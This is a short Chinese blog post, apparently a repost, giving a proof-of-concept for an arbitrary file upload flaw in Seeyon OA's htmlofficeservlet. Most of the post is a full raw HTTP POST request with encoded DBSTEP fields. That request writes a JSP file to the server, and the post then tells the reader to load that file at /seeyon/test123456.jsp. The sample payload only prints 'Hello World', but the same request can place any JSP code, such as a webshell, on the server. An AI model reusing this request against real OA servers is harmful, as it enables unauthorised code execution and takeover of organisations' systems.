码迷,mamicode.com
首页 > Web开发 > 详细

seeyou 致远OA 任意文件上传

时间:2020-12-25 11:46:31      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:option   vax   gzip   test   webp   max-age   you   secure   cin   

访问:http://xxxx/seeyon/htmlofficeservlet,看到
技术图片
POC:

POST /seeyon/htmlofficeservlet HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=531FF04E580BC32CDCE288A8A9E33548;
Connection: close
Content-Length: 493

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<% out.println("<h1>Hello World!</h1>");%>6e4f045d4b8506bf492ada7e3390d7ce

技术图片

访问:http://xxx/seeyon/test123456.jsp
技术图片

seeyou 致远OA 任意文件上传

标签:option   vax   gzip   test   webp   max-age   you   secure   cin   

原文地址:https://www.cnblogs.com/chy4412312/p/14163004.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!